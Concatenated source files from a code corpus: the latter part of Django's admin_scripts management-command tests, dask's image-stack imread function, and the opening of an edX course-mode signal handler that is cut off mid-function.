self.assertEqual(out, 'System check identified no issues (0 silenced).\n')
def test_app_with_import(self):
""" manage.py check does not raise errors when an app imports a base
class that itself has an abstract base. """
self.write_settings('settings.py',
apps=['admin_scripts.app_with_import',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sites'],
sdict={'DEBUG': True})
args = ['check']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertEqual(out, 'System check identified no issues (0 silenced).\n')
def test_output_format(self):
""" All errors/warnings should be sorted by level and by message. """
self.write_settings('settings.py',
apps=['admin_scripts.app_raising_messages',
'django.contrib.auth',
'django.contrib.contenttypes'],
sdict={'DEBUG': True})
args = ['check']
out, err = self.run_manage(args)
expected_err = (
"SystemCheckError: System check identified some issues:\n"
"\n"
"ERRORS:\n"
"?: An error\n"
"\tHINT: Error hint\n"
"\n"
"WARNINGS:\n"
"a: Second warning\n"
"obj: First warning\n"
"\tHINT: Hint\n"
"\n"
"System check identified 3 issues (0 silenced).\n"
)
self.assertEqual(err, expected_err)
self.assertNoOutput(out)
def test_warning_does_not_halt(self):
"""
When there are only warnings or less serious messages, then Django
should not prevent user from launching their project, so `check`
command should not raise `CommandError` exception.
In this test we also test output format.
"""
self.write_settings('settings.py',
apps=['admin_scripts.app_raising_warning',
'django.contrib.auth',
'django.contrib.contenttypes'],
sdict={'DEBUG': True})
args = ['check']
out, err = self.run_manage(args)
expected_err = (
"System check identified some issues:\n" # No "CommandError: " part
"\n"
"WARNINGS:\n"
"?: A warning\n"
"\n"
"System check identified 1 issue (0 silenced).\n"
)
self.assertEqual(err, expected_err)
self.assertNoOutput(out)
class CustomTestRunner(DiscoverRunner):
def __init__(self, *args, **kwargs):
assert 'liveserver' not in kwargs
super(CustomTestRunner, self).__init__(*args, **kwargs)
def run_tests(self, test_labels, extra_tests=None, **kwargs):
pass
class ManageTestCommand(AdminScriptTestCase):
def setUp(self):
from django.core.management.commands.test import Command as TestCommand
self.cmd = TestCommand()
def test_liveserver(self):
"""
Ensure that the --liveserver option sets the environment variable
correctly.
Refs #2879.
"""
# Backup original state
address_predefined = 'DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ
old_address = os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS')
self.cmd.handle(verbosity=0, testrunner='admin_scripts.tests.CustomTestRunner')
# Original state hasn't changed
self.assertEqual('DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ, address_predefined)
self.assertEqual(os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS'), old_address)
self.cmd.handle(verbosity=0, testrunner='admin_scripts.tests.CustomTestRunner',
liveserver='blah')
# Variable was correctly set
self.assertEqual(os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'], 'blah')
# Restore original state
if address_predefined:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = old_address
else:
del os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS']
class ManageRunserver(AdminScriptTestCase):
def setUp(self):
from django.core.management.commands.runserver import Command
def monkey_run(*args, **options):
return
self.output = StringIO()
self.cmd = Command(stdout=self.output)
self.cmd.run = monkey_run
def assertServerSettings(self, addr, port, ipv6=None, raw_ipv6=False):
self.assertEqual(self.cmd.addr, addr)
self.assertEqual(self.cmd.port, port)
self.assertEqual(self.cmd.use_ipv6, ipv6)
self.assertEqual(self.cmd._raw_ipv6, raw_ipv6)
def test_runserver_addrport(self):
self.cmd.handle()
self.assertServerSettings('127.0.0.1', '8000')
self.cmd.handle(addrport="1.2.3.4:8000")
self.assertServerSettings('1.2.3.4', '8000')
self.cmd.handle(addrport="7000")
self.assertServerSettings('127.0.0.1', '7000')
@unittest.skipUnless(socket.has_ipv6, "platform doesn't support IPv6")
def test_runner_addrport_ipv6(self):
self.cmd.handle(addrport="", use_ipv6=True)
self.assertServerSettings('::1', '8000', ipv6=True, raw_ipv6=True)
self.cmd.handle(addrport="7000", use_ipv6=True)
self.assertServerSettings('::1', '7000', ipv6=True, raw_ipv6=True)
self.cmd.handle(addrport="[2001:0db8:1234:5678::9]:7000")
self.assertServerSettings('2001:0db8:1234:5678::9', '7000', ipv6=True, raw_ipv6=True)
def test_runner_hostname(self):
self.cmd.handle(addrport="localhost:8000")
self.assertServerSettings('localhost', '8000')
self.cmd.handle(addrport="test.domain.local:7000")
self.assertServerSettings('test.domain.local', '7000')
@unittest.skipUnless(socket.has_ipv6, "platform doesn't support IPv6")
def test_runner_hostname_ipv6(self):
self.cmd.handle(addrport="test.domain.local:7000", use_ipv6=True)
self.assertServerSettings('test.domain.local', '7000', ipv6=True)
def test_runner_ambiguous(self):
# Only 4 characters, all of which could be in an ipv6 address
self.cmd.handle(addrport="beef:7654")
self.assertServerSettings('beef', '7654')
# Uses only characters that could be in an ipv6 address
self.cmd.handle(addrport="deadbeef:7654")
self.assertServerSettings('deadbeef', '7654')
def test_no_database(self):
"""
Ensure runserver.check_migrations doesn't choke on empty DATABASES.
"""
tested_connections = ConnectionHandler({})
with mock.patch('django.core.management.commands.runserver.connections', new=tested_connections):
self.cmd.check_migrations()
def test_readonly_database(self):
"""
Ensure runserver.check_migrations doesn't choke when a database is read-only
(with possibly no django_migrations table).
"""
with mock.patch.object(
MigrationRecorder, 'ensure_schema',
side_effect=MigrationSchemaMissing()):
self.cmd.check_migrations()
# Check a warning is emitted
self.assertIn("Not checking migrations", self.output.getvalue())
class ManageRunserverEmptyAllowedHosts(AdminScriptTestCase):
def setUp(self):
self.write_settings('settings.py', sdict={
'ALLOWED_HOSTS': [],
'DEBUG': False,
})
def tearDown(self):
self.remove_settings('settings.py')
def test_empty_allowed_hosts_error(self):
out, err = self.run_manage(['runserver'])
self.assertNoOutput(out)
self.assertOutput(err, 'CommandError: You must set settings.ALLOWED_HOSTS if DEBUG is False.')
class ManageTestserver(AdminScriptTestCase):
from django.core.management.commands.testserver import Command as TestserverCommand
@mock.patch.object(TestserverCommand, 'handle')
def test_testserver_handle_params(self, mock_handle):
out = StringIO()
call_command('testserver', 'blah.json', stdout=out)
mock_handle.assert_called_with(
'blah.json',
stdout=out, settings=None, pythonpath=None, verbosity=1,
traceback=False, addrport='', no_color=False, use_ipv6=False,
skip_checks=True, interactive=True,
)
##########################################################################
# COMMAND PROCESSING TESTS
# Check that user-space commands are correctly handled - in particular,
# that arguments to the commands are correctly parsed and processed.
##########################################################################
class CommandTypes(AdminScriptTestCase):
"Tests for the various types of base command types that can be defined."
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_version(self):
"version is handled as a special case"
args = ['version']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, get_version())
def test_version_alternative(self):
"--version is equivalent to version"
args1, args2 = ['version'], ['--version']
# It's possible one outputs on stderr and the other on stdout, hence the set
self.assertEqual(set(self.run_manage(args1)), set(self.run_manage(args2)))
def test_help(self):
"help is handled as a special case"
args = ['help']
out, err = self.run_manage(args)
self.assertOutput(out, "Type 'manage.py help <subcommand>' for help on a specific subcommand.")
self.assertOutput(out, '[django]')
self.assertOutput(out, 'startapp')
self.assertOutput(out, 'startproject')
def test_help_commands(self):
"help --commands shows the list of all available commands"
args = ['help', '--commands']
out, err = self.run_manage(args)
self.assertNotInOutput(out, 'usage:')
self.assertNotInOutput(out, 'Options:')
self.assertNotInOutput(out, '[django]')
self.assertOutput(out, 'startapp')
self.assertOutput(out, 'startproject')
self.assertNotInOutput(out, '\n\n')
def test_help_alternative(self):
"--help is equivalent to help"
args1, args2 = ['help'], ['--help']
self.assertEqual(self.run_manage(args1), self.run_manage(args2))
def test_help_short_altert(self):
"-h is handled as a short form of --help"
args1, args2 = ['--help'], ['-h']
self.assertEqual(self.run_manage(args1), self.run_manage(args2))
def test_specific_help(self):
"--help can be used on a specific command"
args = ['check', '--help']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "Checks the entire Django project for potential problems.")
def test_color_style(self):
style = color.no_style()
self.assertEqual(style.ERROR('Hello, world!'), 'Hello, world!')
style = color.make_style('nocolor')
self.assertEqual(style.ERROR('Hello, world!'), 'Hello, world!')
style = color.make_style('dark')
self.assertIn('Hello, world!', style.ERROR('Hello, world!'))
self.assertNotEqual(style.ERROR('Hello, world!'), 'Hello, world!')
# Default palette has color.
style = color.make_style('')
self.assertIn('Hello, world!', style.ERROR('Hello, world!'))
self.assertNotEqual(style.ERROR('Hello, world!'), 'Hello, world!')
def test_command_color(self):
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stdout.write('Hello, world!', self.style.ERROR)
self.stderr.write('Hello, world!', self.style.ERROR)
out = StringIO()
err = StringIO()
command = Command(stdout=out, stderr=err)
command.execute()
if color.supports_color():
self.assertIn('Hello, world!\n', out.getvalue())
self.assertIn('Hello, world!\n', err.getvalue())
self.assertNotEqual(out.getvalue(), 'Hello, world!\n')
self.assertNotEqual(err.getvalue(), 'Hello, world!\n')
else:
self.assertEqual(out.getvalue(), 'Hello, world!\n')
self.assertEqual(err.getvalue(), 'Hello, world!\n')
def test_command_no_color(self):
"--no-color prevent colorization of the output"
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stdout.write('Hello, world!', self.style.ERROR)
self.stderr.write('Hello, world!', self.style.ERROR)
out = StringIO()
err = StringIO()
command = Command(stdout=out, stderr=err, no_color=True)
command.execute()
self.assertEqual(out.getvalue(), 'Hello, world!\n')
self.assertEqual(err.getvalue(), 'Hello, world!\n')
out = StringIO()
err = StringIO()
command = Command(stdout=out, stderr=err)
command.execute(no_color=True)
self.assertEqual(out.getvalue(), 'Hello, world!\n')
self.assertEqual(err.getvalue(), 'Hello, world!\n')
def test_custom_stdout(self):
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stdout.write("Hello, World!")
out = StringIO()
command = Command(stdout=out)
command.execute()
self.assertEqual(out.getvalue(), "Hello, World!\n")
out.truncate(0)
new_out = StringIO()
command.execute(stdout=new_out)
self.assertEqual(out.getvalue(), "")
self.assertEqual(new_out.getvalue(), "Hello, World!\n")
def test_custom_stderr(self):
class Command(BaseCommand):
requires_system_checks = False
def handle(self, *args, **options):
self.stderr.write("Hello, World!")
err = StringIO()
command = Command(stderr=err)
command.execute()
self.assertEqual(err.getvalue(), "Hello, World!\n")
err.truncate(0)
new_err = StringIO()
command.execute(stderr=new_err)
self.assertEqual(err.getvalue(), "")
self.assertEqual(new_err.getvalue(), "Hello, World!\n")
def test_base_command(self):
"User BaseCommands can execute when a label is provided"
args = ['base_command', 'testlabel']
expected_labels = "('testlabel',)"
self._test_base_command(args, expected_labels)
def test_base_command_no_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command']
expected_labels = "()"
self._test_base_command(args, expected_labels)
def test_base_command_multiple_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command', 'testlabel', 'anotherlabel']
expected_labels = "('testlabel', 'anotherlabel')"
self._test_base_command(args, expected_labels)
def test_base_command_with_option(self):
"User BaseCommands can execute with options when a label is provided"
args = ['base_command', 'testlabel', '--option_a=x']
expected_labels = "('testlabel',)"
self._test_base_command(args, expected_labels, option_a="'x'")
def test_base_command_with_options(self):
"User BaseCommands can execute with multiple options when a label is provided"
args = ['base_command', 'testlabel', '-a', 'x', '--option_b=y']
expected_labels = "('testlabel',)"
self._test_base_command(args, expected_labels, option_a="'x'", option_b="'y'")
def test_base_command_with_wrong_option(self):
"User BaseCommands outputs command usage when wrong option is specified"
args = ['base_command', '--invalid']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "usage: manage.py base_command")
self.assertOutput(err, "error: unrecognized arguments: --invalid")
def _test_base_command(self, args, labels, option_a="'1'", option_b="'2'"):
out, err = self.run_manage(args)
expected_out = (
"EXECUTE:BaseCommand labels=%s, "
"options=[('no_color', False), ('option_a', %s), ('option_b', %s), "
"('option_c', '3'), ('pythonpath', None), ('settings', None), "
"('traceback', False), ('verbosity', 1)]") % (labels, option_a, option_b)
self.assertNoOutput(err)
self.assertOutput(out, expected_out)
def test_base_run_from_argv(self):
"""
Test run_from_argv properly terminates even with custom execute() (#19665)
Also test proper traceback display.
"""
err = StringIO()
command = BaseCommand(stderr=err)
def raise_command_error(*args, **kwargs):
raise CommandError("Custom error")
command.execute = lambda args: args # This will trigger TypeError
# If the Exception is not CommandError it should always
# raise the original exception.
with self.assertRaises(TypeError):
command.run_from_argv(['', ''])
# If the Exception is CommandError and --traceback is not present
# this command should raise a SystemExit and don't print any
# traceback to the stderr.
command.execute = raise_command_error
err.truncate(0)
with self.assertRaises(SystemExit):
command.run_from_argv(['', ''])
err_message = err.getvalue()
self.assertNotIn("Traceback", err_message)
self.assertIn("CommandError", err_message)
# If the Exception is CommandError and --traceback is present
# this command should raise the original CommandError as if it
# were not a CommandError.
err.truncate(0)
with self.assertRaises(CommandError):
command.run_from_argv(['', '', '--traceback'])
def test_run_from_argv_non_ascii_error(self):
"""
Test that non-ASCII message of CommandError does not raise any
UnicodeDecodeError in run_from_argv.
"""
def raise_command_error(*args, **kwargs):
raise CommandError("Erreur personnalisée")
command = BaseCommand(stderr=StringIO())
command.execute = raise_command_error
with self.assertRaises(SystemExit):
command.run_from_argv(['', ''])
def test_run_from_argv_closes_connections(self):
"""
A command called from the command line should close connections after
being executed (#21255).
"""
command = BaseCommand(stderr=StringIO())
command.check = lambda: []
command.handle = lambda *args, **kwargs: args
with mock.patch('django.core.management.base.connections') as mock_connections:
command.run_from_argv(['', ''])
# Test connections have been closed
self.assertTrue(mock_connections.close_all.called)
def test_noargs(self):
"NoArg Commands can be executed"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE: noargs_command options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_noargs_with_args(self):
"NoArg Commands raise an error if an argument is provided"
args = ['noargs_command', 'argument']
out, err = self.run_manage(args)
self.assertOutput(err, "error: unrecognized arguments: argument")
def test_app_command(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'auth']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand name=django.contrib.auth, options=")
self.assertOutput(out, ", options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_app_command_no_apps(self):
"User AppCommands raise an error when no app name is provided"
args = ['app_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'error: Enter at least one application label.')
def test_app_command_multiple_apps(self):
"User AppCommands raise an error when multiple app names are provided"
args = ['app_command', 'auth', 'contenttypes']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand name=django.contrib.auth, options=")
self.assertOutput(out, ", options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
self.assertOutput(out, "EXECUTE:AppCommand name=django.contrib.contenttypes, options=")
self.assertOutput(out, ", options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_app_command_invalid_app_label(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "No installed app with label 'NOT_AN_APP'.")
def test_app_command_some_invalid_app_labels(self):
"User AppCommands can execute when some of the provided app names are invalid"
args = ['app_command', 'auth', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "No installed app with label 'NOT_AN_APP'.")
def test_label_command(self):
"User LabelCommands can execute when a label is provided"
args = ['label_command', 'testlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
def test_label_command_no_label(self):
"User LabelCommands raise an error if no label is provided"
args = ['label_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'Enter at least one label')
def test_label_command_multiple_label(self):
"User LabelCommands are executed multiple times if multiple labels are provided"
args = ['label_command', 'testlabel', 'anotherlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
self.assertOutput(out, "EXECUTE:LabelCommand label=anotherlabel, options=[('no_color', False), ('pythonpath', None), ('settings', None), ('traceback', False), ('verbosity', 1)]")
class Discovery(SimpleTestCase):
def test_precedence(self):
"""
Apps listed first in INSTALLED_APPS have precedence.
"""
with self.settings(INSTALLED_APPS=['admin_scripts.complex_app',
'admin_scripts.simple_app',
'django.contrib.auth',
'django.contrib.contenttypes']):
out = StringIO()
call_command('duplicate', stdout=out)
self.assertEqual(out.getvalue().strip(), 'complex_app')
with self.settings(INSTALLED_APPS=['admin_scripts.simple_app',
'admin_scripts.complex_app',
'django.contrib.auth',
'django.contrib.contenttypes']):
out = StringIO()
call_command('duplicate', stdout=out)
self.assertEqual(out.getvalue().strip(), 'simple_app')
class ArgumentOrder(AdminScriptTestCase):
"""Tests for 2-stage argument parsing scheme.
django-admin command arguments are parsed in 2 parts; the core arguments
(--settings, --traceback and --pythonpath) are parsed using a basic parser,
ignoring any unknown options. Then the full settings are
passed to the command parser, which extracts commands of interest to the
individual command.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth', 'django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_setting_then_option(self):
""" Options passed after settings are correctly handled. """
args = ['base_command', 'testlabel', '--settings=alternate_settings', '--option_a=x']
self._test(args)
def test_setting_then_short_option(self):
""" Short options passed after settings are correctly handled. """
args = ['base_command', 'testlabel', '--settings=alternate_settings', '-a', 'x']
self._test(args)
def test_option_then_setting(self):
""" Options passed before settings are correctly handled. """
args = ['base_command', 'testlabel', '--option_a=x', '--settings=alternate_settings']
self._test(args)
def test_short_option_then_setting(self):
""" Short options passed before settings are correctly handled. """
args = ['base_command', 'testlabel', '-a', 'x', '--settings=alternate_settings']
self._test(args)
def test_option_then_setting_then_option(self):
""" Options are correctly handled when they are passed before and after
a setting. """
args = ['base_command', 'testlabel', '--option_a=x', '--settings=alternate_settings', '--option_b=y']
self._test(args, option_b="'y'")
def _test(self, args, option_b="'2'"):
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('no_color', False), ('option_a', 'x'), ('option_b', %s), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', False), ('verbosity', 1)]" % option_b)
@override_settings(ROOT_URLCONF='admin_scripts.urls')
class StartProject(LiveServerTestCase, AdminScriptTestCase):
available_apps = [
'admin_scripts',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
]
def test_wrong_args(self):
"Make sure passing the wrong kinds of arguments outputs an error and prints usage"
out, err = self.run_django_admin(['startproject'])
self.assertNoOutput(out)
self.assertOutput(err, "usage:")
self.assertOutput(err, "You must provide a project name.")
def test_simple_project(self):
"Make sure the startproject management command creates a project"
args = ['startproject', 'testproject']
testproject_dir = os.path.join(test_dir, 'testproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
# running again..
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "already exists")
def test_invalid_project_name(self):
"Make sure the startproject management command validates a project name"
for bad_name in ('7testproject', '../testproject'):
args = ['startproject', bad_name]
testproject_dir = os.path.join(test_dir, bad_name)
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertOutput(err, "Error: '%s' is not a valid project name. "
"Please make sure the name begins with a letter or underscore." % bad_name)
self.assertFalse(os.path.exists(testproject_dir))
def test_simple_project_different_directory(self):
"Make sure the startproject management command creates a project in a specific directory"
args = ['startproject', 'testproject', 'othertestproject']
testproject_dir = os.path.join(test_dir, 'othertestproject')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'manage.py')))
# running again..
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "already exists")
def test_custom_project_template(self):
"Make sure the startproject management command is able to use a different project template"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'customtestproject']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'additional_dir')))
def test_template_dir_with_trailing_slash(self):
"Ticket 17475: Template dir passed has a trailing path separator"
template_path = os.path.join(custom_templates_dir, 'project_template' + os.sep)
args = ['startproject', '--template', template_path, 'customtestproject']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'additional_dir')))
def test_custom_project_template_from_tarball_by_path(self):
"Make sure the startproject management command is able to use a different project template from a tarball"
template_path = os.path.join(custom_templates_dir, 'project_template.tgz')
args = ['startproject', '--template', template_path, 'tarballtestproject']
testproject_dir = os.path.join(test_dir, 'tarballtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_custom_project_template_from_tarball_to_alternative_location(self):
"Startproject can use a project template from a tarball and create it in a specified location"
template_path = os.path.join(custom_templates_dir, 'project_template.tgz')
args = ['startproject', '--template', template_path, 'tarballtestproject', 'altlocation']
testproject_dir = os.path.join(test_dir, 'altlocation')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_custom_project_template_from_tarball_by_url(self):
"Make sure the startproject management command is able to use a different project template from a tarball via a url"
template_url = '%s/custom_templates/project_template.tgz' % self.live_server_url
args = ['startproject', '--template', template_url, 'urltestproject']
testproject_dir = os.path.join(test_dir, 'urltestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_project_template_tarball_url(self):
"Startproject management command handles project template tar/zip balls from non-canonical urls"
template_url = '%s/custom_templates/project_template.tgz/' % self.live_server_url
args = ['startproject', '--template', template_url, 'urltestproject']
testproject_dir = os.path.join(test_dir, 'urltestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'run.py')))
def test_file_without_extension(self):
"Make sure the startproject management command is able to render custom files"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'customtestproject', '-e', 'txt', '-n', 'Procfile']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
self.assertTrue(os.path.exists(os.path.join(testproject_dir, 'additional_dir')))
base_path = os.path.join(testproject_dir, 'additional_dir')
for f in ('Procfile', 'additional_file.py', 'requirements.txt'):
self.assertTrue(os.path.exists(os.path.join(base_path, f)))
with open(os.path.join(base_path, f)) as fh:
self.assertEqual(fh.read().strip(),
'# some file for customtestproject test project')
def test_custom_project_template_context_variables(self):
"Make sure template context variables are rendered with proper values"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'another_project', 'project_dir']
testproject_dir = os.path.join(test_dir, 'project_dir')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
test_manage_py = os.path.join(testproject_dir, 'manage.py')
with open(test_manage_py, 'r') as fp:
content = force_text(fp.read())
self.assertIn("project_name = 'another_project'", content)
self.assertIn("project_directory = '%s'" % testproject_dir, content)
def test_no_escaping_of_project_variables(self):
"Make sure template context variables are not html escaped"
# We're using a custom command so we need the alternate settings
self.write_settings('alternate_settings.py')
self.addCleanup(self.remove_settings, 'alternate_settings.py')
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['custom_startproject', '--template', template_path, 'another_project', 'project_dir', '--extra', '<&>', '--settings=alternate_settings']
testproject_dir = os.path.join(test_dir, 'project_dir')
os.mkdir(testproject_dir)
self.addCleanup(shutil.rmtree, testproject_dir)
out, err = self.run_manage(args)
self.assertNoOutput(err)
test_manage_py = os.path.join(testproject_dir, 'additional_dir', 'extra.py')
with open(test_manage_py, 'r') as fp:
content = fp.read()
self.assertIn("<&>", content)
def test_custom_project_destination_missing(self):
"""
Make sure an exception is raised when the provided
destination directory doesn't exist
"""
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, 'yet_another_project', 'project_dir2']
testproject_dir = os.path.join(test_dir, 'project_dir2')
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Destination directory '%s' does not exist, please create it first." % testproject_dir)
self.assertFalse(os.path.exists(testproject_dir))
def test_custom_project_template_with_non_ascii_templates(self):
"Ticket 18091: Make sure the startproject management command is able to render templates with non-ASCII content"
template_path = os.path.join(custom_templates_dir, 'project_template')
args = ['startproject', '--template', template_path, '--extension=txt', 'customtestproject']
testproject_dir = os.path.join(test_dir, 'customtestproject')
self.addCleanup(shutil.rmtree, testproject_dir, True)
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertTrue(os.path.isdir(testproject_dir))
path = os.path.join(testproject_dir, 'ticket-18091-non-ascii-template.txt')
with codecs.open(path, 'r', encoding='utf-8') as f:
self.assertEqual(f.read().splitlines(False), [
'Some non-ASCII text for testing ticket #18091:',
'üäö €'])
class DiffSettings(AdminScriptTestCase):
"""Tests for diffsettings management command."""
def test_basic(self):
"""Runs without error and emits settings diff."""
self.write_settings('settings_to_diff.py', sdict={'FOO': '"bar"'})
self.addCleanup(self.remove_settings, 'settings_to_diff.py')
args = ['diffsettings', '--settings=settings_to_diff']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "FOO = 'bar' ###")
def test_all(self):
"""The all option also shows settings with the default value."""
self.write_settings('settings_to_diff.py', sdict={'STATIC_URL': 'None'})
self.addCleanup(self.remove_settings, 'settings_to_diff.py')
args = ['diffsettings', '--settings=settings_to_diff', '--all']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "### STATIC_URL = None")
class Dumpdata(AdminScriptTestCase):
"""Tests for dumpdata management command."""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_pks_parsing(self):
"""Regression for #20509
Test would raise an exception rather than printing an error message.
"""
args = ['dumpdata', '--pks=1']
out, err = self.run_manage(args)
self.assertOutput(err, "You can only use --pks option with one model")
self.assertNoOutput(out)
| bsd-3-clause |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/dask/array/image.py | 6 | 1997 | from __future__ import absolute_import, division, print_function
from glob import glob
import os
try:
from skimage.io import imread as sk_imread
except ImportError:
pass
from .core import Array
from ..base import tokenize
def add_leading_dimension(x):
return x[None, ...]
def imread(filename, imread=None, preprocess=None):
""" Read a stack of images into a dask array
Parameters
----------
filename: string
A globstring like 'myfile.*.png'
imread: function (optional)
Optionally provide custom imread function.
Function should expect a filename and produce a numpy array.
Defaults to ``skimage.io.imread``.
preprocess: function (optional)
Optionally provide custom function to preprocess the image.
Function should expect a numpy array for a single image.
Examples
--------
>>> from dask.array.image import imread
>>> im = imread('2015-*-*.png') # doctest: +SKIP
>>> im.shape # doctest: +SKIP
(365, 1000, 1000, 3)
Returns
-------
Dask array of all images stacked along the first dimension. All images
will be treated as individual chunks
"""
imread = imread or sk_imread
filenames = sorted(glob(filename))
if not filenames:
raise ValueError("No files found under name %s" % filename)
name = 'imread-%s' % tokenize(filenames, map(os.path.getmtime, filenames))
sample = imread(filenames[0])
if preprocess:
sample = preprocess(sample)
keys = [(name, i) + (0,) * len(sample.shape) for i in range(len(filenames))]
if preprocess:
values = [(add_leading_dimension, (preprocess, (imread, fn)))
for fn in filenames]
else:
values = [(add_leading_dimension, (imread, fn))
for fn in filenames]
dsk = dict(zip(keys, values))
chunks = ((1, ) * len(filenames), ) + tuple((d, ) for d in sample.shape)
return Array(dsk, name, chunks, sample.dtype)
| mit |
miptliot/edx-platform | common/djangoapps/course_modes/signals.py | 24 | 1561 | """
Signal handler for setting default course mode expiration dates
"""
from django.core.exceptions import ObjectDoesNotExist
from django.dispatch.dispatcher import receiver
from xmodule.modulestore.django import SignalHandler, modulestore
from .models import CourseMode, CourseModeExpirationConfig
@receiver(SignalHandler.course_published)
def _listen_for_course_publish(sender, course_key, **kwargs): # pylint: disable=unused-argument
"""
Catches the signal that a course has been published in Studio and
sets the verified mode dates to defaults.
"""
try:
